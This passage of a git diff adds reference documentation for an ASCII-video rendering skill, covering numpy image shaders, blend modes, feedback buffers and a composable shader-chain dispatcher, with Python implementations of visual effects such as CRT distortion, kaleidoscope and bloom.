+    canvas = scene["fx"](r, feat, t, r.S)
+    canvas = tonemap(canvas, gamma=scene.get("gamma", 0.75))
+    chain = ShaderChain()
+    for sn, kw in scene.get("shaders", []):
+        chain.add(sn, **kw)
+    canvas = chain.apply(canvas, f=feat, t=t)
+    Image.fromarray(canvas).save(f"test_{args.test_frame:.1f}s.png")
+    print(f"Mean brightness: {canvas.astype(float).mean():.1f}")
+```
+
+CLI: `python reel.py --test-frame 10.0`
+
+---
+
+## Scene Design Checklist
+
+For each scene:
+
+1. **Choose 2-3 grid sizes** — different scales create interference
+2. **Choose different value fields** per layer — don't use the same effect on every grid
+3. **Choose different hue fields** per layer — or at minimum different hue offsets
+4. **Choose different palettes** per layer — mixing PAL_RUNE with PAL_BLOCKS looks different from PAL_RUNE with PAL_DENSE
+5. **Choose a blend mode** that matches the energy — screen for bright, difference for psychedelic, exclusion for subtle
+6. **Add conditional effects** on beat — kaleidoscope, mirror, glitch
+7. **Configure feedback** for trailing/recursive looks — or None for clean cuts
+8. **Set gamma** if using destructive shaders (solarize, posterize)
+9. **Test with --test-frame** at the scene's midpoint before full render
diff --git a/skills/creative/ascii-video/references/shaders.md b/skills/creative/ascii-video/references/shaders.md
new file mode 100644
index 00000000..83993aa7
--- /dev/null
+++ b/skills/creative/ascii-video/references/shaders.md
@@ -0,0 +1,1027 @@
+# Shader Pipeline & Composable Effects
+
+Post-processing effects applied to the pixel canvas (`numpy uint8 array, shape (H,W,3)`) after character rendering and before encoding. Also covers **pixel-level blend modes**, **feedback buffers**, and the **ShaderChain** compositor.
+
+## Design Philosophy
+
+The shader pipeline turns raw ASCII renders into cinematic output. The system is designed for **composability** — every shader, blend mode, and feedback transform is an independent building block. Combining them creates infinite visual variety from a small set of primitives.
+
+Choose shaders that reinforce the mood:
+- **Retro terminal**: CRT + scanlines + grain + green/amber tint
+- **Clean modern**: light bloom + subtle vignette only
+- **Glitch art**: heavy chromatic aberration + glitch bands + color wobble + pixel sort
+- **Cinematic**: bloom + vignette + grain + color grade
+- **Dreamy**: heavy bloom + soft focus + color wobble + low contrast
+- **Harsh/industrial**: high contrast + grain + scanlines + no bloom
+- **Psychedelic**: color wobble + chromatic + kaleidoscope mirror + high saturation + feedback with hue shift
+- **Data corruption**: pixel sort + data bend + block glitch + posterize
+- **Recursive/infinite**: feedback buffer with zoom + screen blend + hue shift
+
+---
+
+## Pixel-Level Blend Modes
+
+All operate on float32 [0,1] canvases for precision. Use `blend_canvas(base, top, mode, opacity)` which handles uint8 <-> float conversion.
+
+### Available Modes
+
+```python
+BLEND_MODES = {
+    "normal":       lambda a, b: b,
+    "add":          lambda a, b: np.clip(a + b, 0, 1),
+    "subtract":     lambda a, b: np.clip(a - b, 0, 1),
+    "multiply":     lambda a, b: a * b,
+    "screen":       lambda a, b: 1 - (1-a)*(1-b),
+    "overlay":      # 2*a*b if a<0.5, else 1-2*(1-a)*(1-b)
+    "softlight":    lambda a, b: (1-2*b)*a*a + 2*b*a,
+    "hardlight":    # like overlay but keyed on b
+    "difference":   lambda a, b: abs(a - b),
+    "exclusion":    lambda a, b: a + b - 2*a*b,
+    "colordodge":   lambda a, b: a / (1-b),
+    "colorburn":    lambda a, b: 1 - (1-a)/b,
+    "linearlight":  lambda a, b: a + 2*b - 1,
+    "vividlight":   # burn if b<0.5, dodge if b>=0.5
+    "pin_light":    # min(a,2b) if b<0.5, max(a,2b-1) if b>=0.5
+    "hard_mix":     lambda a, b: 1 if a+b>=1 else 0,
+    "lighten":      lambda a, b: max(a, b),
+    "darken":       lambda a, b: min(a, b),
+    "grain_extract": lambda a, b: a - b + 0.5,
+    "grain_merge":  lambda a, b: a + b - 0.5,
+}
+```
+
+### Usage
+
+```python
+def blend_canvas(base, top, mode="normal", opacity=1.0):
+    """Blend two uint8 canvases (H,W,3) using a named blend mode + opacity."""
+    af = base.astype(np.float32) / 255.0
+    bf = top.astype(np.float32) / 255.0
+    result = BLEND_MODES[mode](af, bf)
+    if opacity < 1.0:
+        result = af * (1-opacity) + result * opacity
+    return np.clip(result * 255, 0, 255).astype(np.uint8)
+
+# Multi-layer compositing
+result = blend_canvas(base, layer_a, "screen", 0.7)
+result = blend_canvas(result, layer_b, "difference", 0.5)
+result = blend_canvas(result, layer_c, "multiply", 0.3)
+```
+
+### Creative Combinations
+
+- **Feedback + difference** = psychedelic color evolution (each frame XORs with the previous)
+- **Screen + screen** = additive glow stacking
+- **Multiply** on two different effects = only shows where both have brightness (intersection)
+- **Exclusion** between two layers = creates complementary patterns where they differ
+- **Color dodge/burn** = extreme contrast enhancement at overlap zones
+- **Hard mix** = reduces everything to pure black/white/color at intersections
+
+---
+
+## Feedback Buffer
+
+Recursive temporal effect: frame N-1 feeds back into frame N with decay and optional spatial transform. Creates trails, echoes, smearing, zoom tunnels, rotation feedback, rainbow trails.
+
+```python
+class FeedbackBuffer:
+    def __init__(self):
+        self.buf = None  # previous frame (float32, 0-1)
+    
+    def apply(self, canvas, decay=0.85, blend="screen", opacity=0.5,
+              transform=None, transform_amt=0.02, hue_shift=0.0):
+        """Mix current frame with decayed/transformed previous frame.
+        
+        Args:
+            canvas: current frame (uint8 H,W,3)
+            decay: how fast old frame fades (0=instant, 1=permanent)
+            blend: blend mode for mixing feedback
+            opacity: strength of feedback mix
+            transform: None, "zoom", "shrink", "rotate_cw", "rotate_ccw",
+                       "shift_up", "shift_down", "mirror_h"
+            transform_amt: strength of spatial transform per frame
+            hue_shift: rotate hue of feedback buffer each frame (0-1)
+        """
+```
+
+### Feedback Presets
+
+```python
+# Infinite zoom tunnel
+fb_cfg = {"decay": 0.8, "blend": "screen", "opacity": 0.4,
+          "transform": "zoom", "transform_amt": 0.015}
+
+# Rainbow trails (psychedelic)
+fb_cfg = {"decay": 0.7, "blend": "screen", "opacity": 0.3,
+          "transform": "zoom", "transform_amt": 0.01, "hue_shift": 0.02}
+
+# Ghostly echo (horror)
+fb_cfg = {"decay": 0.9, "blend": "add", "opacity": 0.15,
+          "transform": "shift_up", "transform_amt": 0.01}
+
+# Kaleidoscopic recursion
+fb_cfg = {"decay": 0.75, "blend": "screen", "opacity": 0.35,
+          "transform": "rotate_cw", "transform_amt": 0.005, "hue_shift": 0.01}
+
+# Color evolution (abstract)
+fb_cfg = {"decay": 0.8, "blend": "difference", "opacity": 0.4, "hue_shift": 0.03}
+
+# Multiplied depth
+fb_cfg = {"decay": 0.65, "blend": "multiply", "opacity": 0.3, "transform": "mirror_h"}
+
+# Rising heat haze
+fb_cfg = {"decay": 0.5, "blend": "add", "opacity": 0.2,
+          "transform": "shift_up", "transform_amt": 0.02}
+```
+
+---
+
+## ShaderChain
+
+Composable shader pipeline. Build chains of named shaders with parameters. Order matters — shaders are applied sequentially to the canvas.
+
+```python
+class ShaderChain:
+    """Composable shader pipeline.
+    
+    Usage:
+        chain = ShaderChain()
+        chain.add("bloom", thr=120)
+        chain.add("chromatic", amt=5)
+        chain.add("kaleidoscope", folds=6)
+        chain.add("vignette", s=0.2)
+        chain.add("grain", amt=12)
+        canvas = chain.apply(canvas, f=features, t=time)
+    """
+    def __init__(self):
+        self.steps = []
+
+    def add(self, shader_name, **kwargs):
+        self.steps.append((shader_name, kwargs))
+        return self  # chainable
+
+    def apply(self, canvas, f=None, t=0):
+        if f is None: f = {}
+        for name, kwargs in self.steps:
+            canvas = _apply_shader_step(canvas, name, kwargs, f, t)
+        return canvas
+```
+
+### `_apply_shader_step()` — Full Dispatch Function
+
+Routes shader names to implementations. Some shaders have **audio-reactive scaling** — the dispatch function reads `f["bdecay"]` and `f["rms"]` to modulate parameters on the beat.
+
+```python
+def _apply_shader_step(canvas, name, kwargs, f, t):
+    """Dispatch a single shader by name with kwargs.
+    
+    Args:
+        canvas: uint8 (H,W,3) pixel array
+        name: shader key string (e.g. "bloom", "chromatic")
+        kwargs: dict of shader parameters
+        f: audio features dict (keys: bdecay, rms, sub, etc.)
+        t: current time in seconds (float)
+    Returns:
+        canvas: uint8 (H,W,3) — processed
+    """
+    bd = f.get("bdecay", 0)    # beat decay (0-1, high on beat)
+    rms = f.get("rms", 0.3)   # audio energy (0-1)
+
+    # --- Geometry ---
+    if name == "crt":
+        return sh_crt(canvas, kwargs.get("strength", 0.05))
+    elif name == "pixelate":
+        return sh_pixelate(canvas, kwargs.get("block", 4))
+    elif name == "wave_distort":
+        return sh_wave_distort(canvas, t,
+            kwargs.get("freq", 0.02), kwargs.get("amp", 8), kwargs.get("axis", "x"))
+    elif name == "kaleidoscope":
+        return sh_kaleidoscope(canvas.copy(), kwargs.get("folds", 6))
+    elif name == "mirror_h":
+        return sh_mirror_h(canvas.copy())
+    elif name == "mirror_v":
+        return sh_mirror_v(canvas.copy())
+    elif name == "mirror_quad":
+        return sh_mirror_quad(canvas.copy())
+    elif name == "mirror_diag":
+        return sh_mirror_diag(canvas.copy())
+
+    # --- Channel ---
+    elif name == "chromatic":
+        base = kwargs.get("amt", 3)
+        return sh_chromatic(canvas, max(1, int(base * (0.4 + bd * 0.8))))
+    elif name == "channel_shift":
+        return sh_channel_shift(canvas,
+            kwargs.get("r", (0,0)), kwargs.get("g", (0,0)), kwargs.get("b", (0,0)))
+    elif name == "channel_swap":
+        return sh_channel_swap(canvas, kwargs.get("order", (2,1,0)))
+    elif name == "rgb_split_radial":
+        return sh_rgb_split_radial(canvas, kwargs.get("strength", 5))
+
+    # --- Color ---
+    elif name == "invert":
+        return sh_invert(canvas)
+    elif name == "posterize":
+        return sh_posterize(canvas, kwargs.get("levels", 4))
+    elif name == "threshold":
+        return sh_threshold(canvas, kwargs.get("thr", 128))
+    elif name == "solarize":
+        return sh_solarize(canvas, kwargs.get("threshold", 128))
+    elif name == "hue_rotate":
+        return sh_hue_rotate(canvas, kwargs.get("amount", 0.1))
+    elif name == "saturation":
+        return sh_saturation(canvas, kwargs.get("factor", 1.5))
+    elif name == "color_grade":
+        return sh_color_grade(canvas, kwargs.get("tint", (1,1,1)))
+    elif name == "color_wobble":
+        return sh_color_wobble(canvas, t, kwargs.get("amt", 0.3) * (0.5 + rms * 0.8))
+    elif name == "color_ramp":
+        return sh_color_ramp(canvas, kwargs.get("ramp", [(0,0,0),(255,255,255)]))
+
+    # --- Glow / Blur ---
+    elif name == "bloom":
+        return sh_bloom(canvas, kwargs.get("thr", 130))
+    elif name == "edge_glow":
+        return sh_edge_glow(canvas, kwargs.get("hue", 0.5))
+    elif name == "soft_focus":
+        return sh_soft_focus(canvas, kwargs.get("strength", 0.3))
+    elif name == "radial_blur":
+        return sh_radial_blur(canvas, kwargs.get("strength", 0.03))
+
+    # --- Noise ---
+    elif name == "grain":
+        return sh_grain(canvas, int(kwargs.get("amt", 10) * (0.5 + rms * 0.8)))
+    elif name == "static":
+        return sh_static_noise(canvas, kwargs.get("density", 0.05), kwargs.get("color", True))
+
+    # --- Lines / Patterns ---
+    elif name == "scanlines":
+        return sh_scanlines(canvas, kwargs.get("intensity", 0.08), kwargs.get("spacing", 3))
+    elif name == "halftone":
+        return sh_halftone(canvas, kwargs.get("dot_size", 6))
+
+    # --- Tone ---
+    elif name == "vignette":
+        return sh_vignette(canvas, kwargs.get("s", 0.22))
+    elif name == "contrast":
+        return sh_contrast(canvas, kwargs.get("factor", 1.3))
+    elif name == "gamma":
+        return sh_gamma(canvas, kwargs.get("gamma", 1.5))
+    elif name == "levels":
+        return sh_levels(canvas,
+            kwargs.get("black", 0), kwargs.get("white", 255), kwargs.get("midtone", 1.0))
+    elif name == "brightness":
+        return sh_brightness(canvas, kwargs.get("factor", 1.5))
+
+    # --- Glitch / Data ---
+    elif name == "glitch_bands":
+        return sh_glitch_bands(canvas, f)
+    elif name == "block_glitch":
+        return sh_block_glitch(canvas, kwargs.get("n_blocks", 8), kwargs.get("max_size", 40))
+    elif name == "pixel_sort":
+        return sh_pixel_sort(canvas, kwargs.get("threshold", 100), kwargs.get("direction", "h"))
+    elif name == "data_bend":
+        return sh_data_bend(canvas, kwargs.get("offset", 1000), kwargs.get("chunk", 500))
+
+    else:
+        return canvas  # unknown shader — passthrough
+```
+
+### Audio-Reactive Shaders
+
+Three shaders scale their parameters based on audio features:
+
+| Shader | Reactive To | Effect |
+|--------|------------|--------|
+| `chromatic` | `bdecay` | `amt * (0.4 + bdecay * 0.8)` — aberration kicks on beats |
+| `color_wobble` | `rms` | `amt * (0.5 + rms * 0.8)` — wobble intensity follows energy |
+| `grain` | `rms` | `amt * (0.5 + rms * 0.8)` — grain rougher in loud sections |
+| `glitch_bands` | `bdecay`, `sub` | Number of bands and displacement scale with beat energy |
+
+To make any shader beat-reactive, scale its parameter in the dispatch: `base_val * (low + bd * range)`.
+
+---
+
+## Full Shader Catalog
+
+### Geometry Shaders
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `crt` | `strength=0.05` | CRT barrel distortion (cached remap) |
+| `pixelate` | `block=4` | Reduce effective resolution |
+| `wave_distort` | `freq, amp, axis` | Sinusoidal row/column displacement |
+| `kaleidoscope` | `folds=6` | Radial symmetry via polar remapping |
+| `mirror_h` | — | Horizontal mirror |
+| `mirror_v` | — | Vertical mirror |
+| `mirror_quad` | — | 4-fold mirror |
+| `mirror_diag` | — | Diagonal mirror |
+
+### Channel Manipulation
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `chromatic` | `amt=3` | R/B channel horizontal shift (beat-reactive) |
+| `channel_shift` | `r=(sx,sy), g, b` | Independent per-channel x,y shifting |
+| `channel_swap` | `order=(2,1,0)` | Reorder RGB channels (BGR, GRB, etc.) |
+| `rgb_split_radial` | `strength=5` | Chromatic aberration radiating from center |
+
+### Color Manipulation
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `invert` | — | Negate all colors |
+| `posterize` | `levels=4` | Reduce color depth to N levels |
+| `threshold` | `thr=128` | Binary black/white |
+| `solarize` | `threshold=128` | Invert pixels above threshold |
+| `hue_rotate` | `amount=0.1` | Rotate all hues by amount (0-1) |
+| `saturation` | `factor=1.5` | Scale saturation (>1=more, <1=less) |
+| `color_grade` | `tint=(r,g,b)` | Per-channel multiplier |
+| `color_wobble` | `amt=0.3` | Time-varying per-channel sine modulation |
+| `color_ramp` | `ramp=[(R,G,B),...]` | Map luminance to custom color gradient |
+
+### Glow / Blur
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `bloom` | `thr=130` | Bright area glow (4x downsample + box blur) |
+| `edge_glow` | `hue=0.5` | Detect edges, add colored overlay |
+| `soft_focus` | `strength=0.3` | Blend with blurred version |
+| `radial_blur` | `strength=0.03` | Zoom blur from center outward |
+
+### Noise / Grain
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `grain` | `amt=10` | 2x-downsampled film grain (beat-reactive) |
+| `static` | `density=0.05, color=True` | Random pixel noise (TV static) |
+
+### Lines / Patterns
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `scanlines` | `intensity=0.08, spacing=3` | Darken every Nth row |
+| `halftone` | `dot_size=6` | Halftone dot pattern overlay |
+
+### Tone
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `vignette` | `s=0.22` | Edge darkening (cached distance field) |
+| `contrast` | `factor=1.3` | Adjust contrast around midpoint 128 |
+| `gamma` | `gamma=1.5` | Gamma correction (>1=brighter mids) |
+| `levels` | `black, white, midtone` | Levels adjustment (Photoshop-style) |
+| `brightness` | `factor=1.5` | Global brightness multiplier |
+
+### Glitch / Data
+
+| Shader | Key Params | Description |
+|--------|-----------|-------------|
+| `glitch_bands` | (uses `f`) | Beat-reactive horizontal row displacement |
+| `block_glitch` | `n_blocks=8, max_size=40` | Random rectangular block displacement |
+| `pixel_sort` | `threshold=100, direction="h"` | Sort pixels by brightness in rows/columns |
+| `data_bend` | `offset, chunk` | Raw byte displacement (datamoshing) |
+
+---
+
+## Shader Implementations
+
+Every shader function takes a canvas (`uint8 H,W,3`) and returns a canvas of the same shape. The naming convention is `sh_<name>`. Geometry shaders that build coordinate remap tables should **cache** them since the table only depends on resolution + parameters, not on frame content.
+
+### Helpers
+
+Shaders that manipulate hue/saturation need vectorized HSV conversion:
+
+```python
+def rgb2hsv(r, g, b):
+    """Vectorized RGB (0-255 uint8) -> HSV (float32 0-1)."""
+    rf = r.astype(np.float32) / 255.0
+    gf = g.astype(np.float32) / 255.0
+    bf = b.astype(np.float32) / 255.0
+    cmax = np.maximum(np.maximum(rf, gf), bf)
+    cmin = np.minimum(np.minimum(rf, gf), bf)
+    delta = cmax - cmin + 1e-10
+    h = np.zeros_like(rf)
+    m = cmax == rf; h[m] = ((gf[m] - bf[m]) / delta[m]) % 6
+    m = cmax == gf; h[m] = (bf[m] - rf[m]) / delta[m] + 2
+    m = cmax == bf; h[m] = (rf[m] - gf[m]) / delta[m] + 4
+    h = h / 6.0 % 1.0
+    s = np.where(cmax > 0, delta / (cmax + 1e-10), 0)
+    return h, s, cmax
+
+def hsv2rgb(h, s, v):
+    """Vectorized HSV->RGB. h,s,v are numpy float32 arrays."""
+    h = h % 1.0
+    c = v * s; x = c * (1 - np.abs((h * 6) % 2 - 1)); m = v - c
+    r = np.zeros_like(h); g = np.zeros_like(h); b = np.zeros_like(h)
+    mask = h < 1/6;            r[mask]=c[mask]; g[mask]=x[mask]
+    mask = (h>=1/6)&(h<2/6);   r[mask]=x[mask]; g[mask]=c[mask]
+    mask = (h>=2/6)&(h<3/6);   g[mask]=c[mask]; b[mask]=x[mask]
+    mask = (h>=3/6)&(h<4/6);   g[mask]=x[mask]; b[mask]=c[mask]
+    mask = (h>=4/6)&(h<5/6);   r[mask]=x[mask]; b[mask]=c[mask]
+    mask = h >= 5/6;            r[mask]=c[mask]; b[mask]=x[mask]
+    R = np.clip((r+m)*255, 0, 255).astype(np.uint8)
+    G = np.clip((g+m)*255, 0, 255).astype(np.uint8)
+    B = np.clip((b+m)*255, 0, 255).astype(np.uint8)
+    return R, G, B
+
+def mkc(R, G, B, rows, cols):
+    """Stack R,G,B uint8 arrays into (rows,cols,3) canvas."""
+    o = np.zeros((rows, cols, 3), dtype=np.uint8)
+    o[:,:,0] = R; o[:,:,1] = G; o[:,:,2] = B
+    return o
+```
+
+---
+
+### Geometry Shaders
+
+#### CRT Barrel Distortion
+Cache the coordinate remap — it never changes per frame:
+```python
+_crt_cache = {}
+def sh_crt(c, strength=0.05):
+    k = (c.shape[0], c.shape[1], round(strength, 3))
+    if k not in _crt_cache:
+        h, w = c.shape[:2]; cy, cx = h/2, w/2
+        Y = np.arange(h, dtype=np.float32)[:, None]
+        X = np.arange(w, dtype=np.float32)[None, :]
+        ny = (Y - cy) / cy; nx = (X - cx) / cx
+        r2 = nx**2 + ny**2
+        factor = 1 + strength * r2
+        sx = np.clip((nx * factor * cx + cx), 0, w-1).astype(np.int32)
+        sy = np.clip((ny * factor * cy + cy), 0, h-1).astype(np.int32)
+        _crt_cache[k] = (sy, sx)
+    sy, sx = _crt_cache[k]
+    return c[sy, sx]
+```
+
+#### Pixelate
+```python
+def sh_pixelate(c, block=4):
+    """Reduce effective resolution."""
+    sm = c[::block, ::block]
+    return np.repeat(np.repeat(sm, block, axis=0), block, axis=1)[:c.shape[0], :c.shape[1]]
+```
+
+#### Wave Distort
+```python
+def sh_wave_distort(c, t, freq=0.02, amp=8, axis="x"):
+    """Sinusoidal row/column displacement. Uses time t for animation."""
+    h, w = c.shape[:2]
+    out = c.copy()
+    if axis == "x":
+        for y in range(h):
+            shift = int(amp * math.sin(y * freq + t * 3))
+            out[y] = np.roll(c[y], shift, axis=0)
+    else:
+        for x in range(w):
+            shift = int(amp * math.sin(x * freq + t * 3))
+            out[:, x] = np.roll(c[:, x], shift, axis=0)
+    return out
+```
+
+#### Displacement Map
+```python
+def sh_displacement_map(c, dx_map, dy_map, strength=10):
+    """Displace pixels using float32 displacement maps (same HxW as c).
+    dx_map/dy_map: positive = shift right/down."""
+    h, w = c.shape[:2]
+    Y = np.arange(h)[:, None]; X = np.arange(w)[None, :]
+    ny = np.clip((Y + (dy_map * strength).astype(int)), 0, h-1)
+    nx = np.clip((X + (dx_map * strength).astype(int)), 0, w-1)
+    return c[ny, nx]
+```
+
+#### Kaleidoscope
+```python
+def sh_kaleidoscope(c, folds=6):
+    """Radial symmetry by polar coordinate remapping."""
+    h, w = c.shape[:2]; cy, cx = h//2, w//2
+    Y = np.arange(h, dtype=np.float32)[:, None] - cy
+    X = np.arange(w, dtype=np.float32)[None, :] - cx
+    angle = np.arctan2(Y, X)
+    dist = np.sqrt(X**2 + Y**2)
+    wedge = 2 * np.pi / folds
+    folded_angle = np.abs((angle % wedge) - wedge/2)
+    ny = np.clip((cy + dist * np.sin(folded_angle)).astype(int), 0, h-1)
+    nx = np.clip((cx + dist * np.cos(folded_angle)).astype(int), 0, w-1)
+    return c[ny, nx]
+```
+
+#### Mirror Variants
+```python
+def sh_mirror_h(c):
+    """Horizontal mirror — left half reflected to right."""
+    w = c.shape[1]; c[:, w//2:] = c[:, :w//2][:, ::-1]; return c
+
+def sh_mirror_v(c):
+    """Vertical mirror — top half reflected to bottom."""
+    h = c.shape[0]; c[h//2:, :] = c[:h//2, :][::-1, :]; return c
+
+def sh_mirror_quad(c):
+    """4-fold mirror — top-left quadrant reflected to all four."""
+    h, w = c.shape[:2]; hh, hw = h//2, w//2
+    tl = c[:hh, :hw].copy()
+    c[:hh, hw:hw+tl.shape[1]] = tl[:, ::-1]
+    c[hh:hh+tl.shape[0], :hw] = tl[::-1, :]
+    c[hh:hh+tl.shape[0], hw:hw+tl.shape[1]] = tl[::-1, ::-1]
+    return c
+
+def sh_mirror_diag(c):
+    """Diagonal mirror — top-left triangle reflected."""
+    h, w = c.shape[:2]
+    for y in range(h):
+        x_cut = int(w * y / h)
+        if x_cut > 0 and x_cut < w:
+            c[y, x_cut:] = c[y, :x_cut+1][::-1][:w-x_cut]
+    return c
+```
+
+> **Note:** Mirror shaders mutate in-place. The dispatch function passes `canvas.copy()` to avoid corrupting the original.
+
+---
+
+### Channel Manipulation Shaders
+
+#### Chromatic Aberration
+```python
+def sh_chromatic(c, amt=3):
+    """R/B channel horizontal shift. Beat-reactive in dispatch (amt scaled by bdecay)."""
+    if amt < 1: return c
+    a = int(amt)
+    o = c.copy()
+    o[:, a:, 0] = c[:, :-a, 0]   # red shifts right
+    o[:, :-a, 2] = c[:, a:, 2]   # blue shifts left
+    return o
+```
+
+#### Channel Shift
+```python
+def sh_channel_shift(c, r_shift=(0,0), g_shift=(0,0), b_shift=(0,0)):
+    """Independent per-channel x,y shifting."""
+    o = c.copy()
+    for ch_i, (sx, sy) in enumerate([r_shift, g_shift, b_shift]):
+        if sx != 0: o[:,:,ch_i] = np.roll(c[:,:,ch_i], sx, axis=1)
+        if sy != 0: o[:,:,ch_i] = np.roll(o[:,:,ch_i], sy, axis=0)
+    return o
+```
+
+#### Channel Swap
+```python
+def sh_channel_swap(c, order=(2,1,0)):
+    """Reorder RGB channels. (2,1,0)=BGR, (1,0,2)=GRB, etc."""
+    return c[:, :, list(order)]
+```
+
+#### RGB Split Radial
+```python
+def sh_rgb_split_radial(c, strength=5):
+    """Chromatic aberration radiating from center — stronger at edges."""
+    h, w = c.shape[:2]; cy, cx = h//2, w//2
+    Y = np.arange(h, dtype=np.float32)[:, None]
+    X = np.arange(w, dtype=np.float32)[None, :]
+    dist = np.sqrt((Y-cy)**2 + (X-cx)**2)
+    max_dist = np.sqrt(cy**2 + cx**2)
+    factor = dist / max_dist * strength
+    dy = ((Y-cy) / (dist+1) * factor).astype(int)
+    dx = ((X-cx) / (dist+1) * factor).astype(int)
+    out = c.copy()
+    ry = np.clip(Y.astype(int)+dy, 0, h-1); rx = np.clip(X.astype(int)+dx, 0, w-1)
+    out[:,:,0] = c[ry, rx, 0]  # red shifts outward
+    by = np.clip(Y.astype(int)-dy, 0, h-1); bx = np.clip(X.astype(int)-dx, 0, w-1)
+    out[:,:,2] = c[by, bx, 2]  # blue shifts inward
+    return out
+```
+
+---
+
+### Color Manipulation Shaders
+
+#### Invert
+```python
+def sh_invert(c):
+    return 255 - c
+```
+
+#### Posterize
+```python
+def sh_posterize(c, levels=4):
+    """Reduce color depth to N levels per channel."""
+    step = 256.0 / levels
+    return (np.floor(c.astype(np.float32) / step) * step).astype(np.uint8)
+```
+
+#### Threshold
+```python
+def sh_threshold(c, thr=128):
+    """Binary black/white at threshold."""
+    gray = c.astype(np.float32).mean(axis=2)
+    out = np.zeros_like(c); out[gray > thr] = 255
+    return out
+```
+
+#### Solarize
+```python
+def sh_solarize(c, threshold=128):
+    """Invert pixels above threshold — classic darkroom effect."""
+    o = c.copy(); mask = c > threshold; o[mask] = 255 - c[mask]
+    return o
+```
+
+#### Hue Rotate
+```python
+def sh_hue_rotate(c, amount=0.1):
+    """Rotate all hues by amount (0-1)."""
+    h, s, v = rgb2hsv(c[:,:,0], c[:,:,1], c[:,:,2])
+    h = (h + amount) % 1.0
+    R, G, B = hsv2rgb(h, s, v)
+    return mkc(R, G, B, c.shape[0], c.shape[1])
+```
+
+#### Saturation
+```python
+def sh_saturation(c, factor=1.5):
+    """Adjust saturation. >1=more saturated, <1=desaturated."""
+    h, s, v = rgb2hsv(c[:,:,0], c[:,:,1], c[:,:,2])
+    s = np.clip(s * factor, 0, 1)
+    R, G, B = hsv2rgb(h, s, v)
+    return mkc(R, G, B, c.shape[0], c.shape[1])
+```
+
+#### Color Grade
+```python
+def sh_color_grade(c, tint):
+    """Per-channel multiplier. tint=(r_mul, g_mul, b_mul)."""
+    o = c.astype(np.float32)
+    o[:,:,0] *= tint[0]; o[:,:,1] *= tint[1]; o[:,:,2] *= tint[2]
+    return np.clip(o, 0, 255).astype(np.uint8)
+```
+
+#### Color Wobble
+```python
+def sh_color_wobble(c, t, amt=0.3):
+    """Time-varying per-channel sine modulation. Audio-reactive in dispatch (amt scaled by rms)."""
+    o = c.astype(np.float32)
+    o[:,:,0] *= 1.0 + amt * math.sin(t * 5.0)
+    o[:,:,1] *= 1.0 + amt * math.sin(t * 5.0 + 2.09)
+    o[:,:,2] *= 1.0 + amt * math.sin(t * 5.0 + 4.19)
+    return np.clip(o, 0, 255).astype(np.uint8)
+```
+
+#### Color Ramp
+```python
+def sh_color_ramp(c, ramp_colors):
+    """Map luminance to a custom color gradient.
+    ramp_colors = list of (R,G,B) tuples, evenly spaced from dark to bright."""
+    gray = c.astype(np.float32).mean(axis=2) / 255.0
+    n = len(ramp_colors)
+    idx = np.clip(gray * (n-1), 0, n-1.001)
+    lo = np.floor(idx).astype(int); hi = np.minimum(lo+1, n-1)
+    frac = idx - lo
+    ramp = np.array(ramp_colors, dtype=np.float32)
+    out = ramp[lo] * (1-frac[:,:,None]) + ramp[hi] * frac[:,:,None]
+    return np.clip(out, 0, 255).astype(np.uint8)
+```
+
+---
+
+### Glow / Blur Shaders
+
+#### Bloom
+```python
+def sh_bloom(c, thr=130):
+    """Bright-area glow: 4x downsample, threshold, 3-pass box blur, screen blend."""
+    sm = c[::4, ::4].astype(np.float32)
+    br = np.where(sm > thr, sm, 0)
+    for _ in range(3):
+        p = np.pad(br, ((1,1),(1,1),(0,0)), mode="edge")
+        br = (p[:-2,:-2]+p[:-2,1:-1]+p[:-2,2:]+p[1:-1,:-2]+p[1:-1,1:-1]+
+              p[1:-1,2:]+p[2:,:-2]+p[2:,1:-1]+p[2:,2:]) / 9.0
+    bl = np.repeat(np.repeat(br, 4, axis=0), 4, axis=1)[:c.shape[0], :c.shape[1]]
+    return np.clip(c.astype(np.float32) + bl * 0.5, 0, 255).astype(np.uint8)
+```
+
+#### Edge Glow
+```python
+def sh_edge_glow(c, hue=0.5):
+    """Detect edges via gradient, add colored overlay."""
+    gray = c.astype(np.float32).mean(axis=2)
+    gx = np.abs(gray[:, 2:] - gray[:, :-2])
+    gy = np.abs(gray[2:, :] - gray[:-2, :])
+    ex = np.zeros_like(gray); ey = np.zeros_like(gray)
+    ex[:, 1:-1] = gx; ey[1:-1, :] = gy
+    edge = np.clip((ex + ey) / 255 * 2, 0, 1)
+    R, G, B = hsv2rgb(np.full_like(edge, hue), np.full_like(edge, 0.8), edge * 0.5)
+    out = c.astype(np.int16).copy()
+    out[:,:,0] = np.clip(out[:,:,0] + R.astype(np.int16), 0, 255)
+    out[:,:,1] = np.clip(out[:,:,1] + G.astype(np.int16), 0, 255)
+    out[:,:,2] = np.clip(out[:,:,2] + B.astype(np.int16), 0, 255)
+    return out.astype(np.uint8)
+```
+
+#### Soft Focus
+```python
+def sh_soft_focus(c, strength=0.3):
+    """Blend original with 2x-downsampled box blur."""
+    sm = c[::2, ::2].astype(np.float32)
+    p = np.pad(sm, ((1,1),(1,1),(0,0)), mode="edge")
+    bl = (p[:-2,:-2]+p[:-2,1:-1]+p[:-2,2:]+p[1:-1,:-2]+p[1:-1,1:-1]+
+          p[1:-1,2:]+p[2:,:-2]+p[2:,1:-1]+p[2:,2:]) / 9.0
+    bl = np.repeat(np.repeat(bl, 2, axis=0), 2, axis=1)[:c.shape[0], :c.shape[1]]
+    return np.clip(c * (1-strength) + bl * strength, 0, 255).astype(np.uint8)
+```
+
+#### Radial Blur
+```python
+def sh_radial_blur(c, strength=0.03, center=None):
+    """Zoom blur from center — motion blur radiating outward."""
+    h, w = c.shape[:2]
+    cy, cx = center if center else (h//2, w//2)
+    Y = np.arange(h, dtype=np.float32)[:, None]
+    X = np.arange(w, dtype=np.float32)[None, :]
+    out = c.astype(np.float32)
+    for s in [strength, strength*2]:
+        dy = (Y - cy) * s; dx = (X - cx) * s
+        sy = np.clip((Y + dy).astype(int), 0, h-1)
+        sx = np.clip((X + dx).astype(int), 0, w-1)
+        out += c[sy, sx].astype(np.float32)
+    return np.clip(out / 3, 0, 255).astype(np.uint8)
